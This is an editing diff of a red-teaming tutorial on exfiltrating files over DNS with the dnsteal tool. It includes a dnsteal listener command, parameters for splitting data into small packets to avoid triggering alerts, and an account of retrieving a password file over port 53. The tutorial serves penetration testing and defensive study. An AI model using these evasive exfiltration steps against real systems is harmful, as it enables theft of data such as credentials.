Exfiltration, Red Teaming

 Again, you will see that it generated two commands.
 However, this time we will copy the second one (highlighted on) and paste it in the destination folder as shown below:

-Upon the execution of the command, you can see the folder is received accurately with the calculated MD5 hash sum for each file as shown in the image below:
+Upon executing the command, you can see that the system receives the folder accurately with the calculated MD5 hash sum for each file, as shown in the image below:

 To reduce the suspicion of the attack, an attacker can divide the file into multiple packets.
 These packets can be of fixed size in bytes.
-An attacker can even allocate some bytes to the file name. this is done to avoid triggering an alert in a network which abusing of UDP packet’s size will do.
-This customization can be done by using -s, -b and -f parameters.
+An attacker can even allocate some bytes to the file name.
+They do this to avoid triggering an alert in a network, which abusing the UDP packet’s size will do.
+They can customize this by using -s, -b, and -f parameters.
 The parameter -s is for defining the subdomain value, -b is for specifying the number of bytes per packet and -f is for defining the value of bytes for the filename.
-In the following command, which can be well observed from the image given below as well, we have defined 4 subdomains.
-The bytes per packet are set to 57and file name value is 17.
+In the following command, which you can observe well from the image given below as well, we define 4 subdomains.
+We set the bytes per packet to 57 and the file name value to 17.

 python dnsteal.py 192.168.1.112 -z -s 4 -b 57 -f 17

-Once the command is executed, you can see that the data received will be in chunks of 243 bytes as shown in the image below.
-And when the receiving is complete, it will give you the MD5 hash sum too and you can read the contents of the file with simple cat command as the file received will be uncompressed:
+Once you execute the command, you can see that the system receives the data in chunks of 243 bytes as shown in the image below.
+When the system completes the receiving, it will also provide you with the MD5 hash sum, and you can read the contents of the file with the simple cat command as the system receives the uncompressed file:

 And this way we have retrieved the password file.
 And while this transfer of data, Wireshark helped us validate the bytes per packet size.
 Also, we can confirm that the connection established as well as the transfer of data is being done on port 53.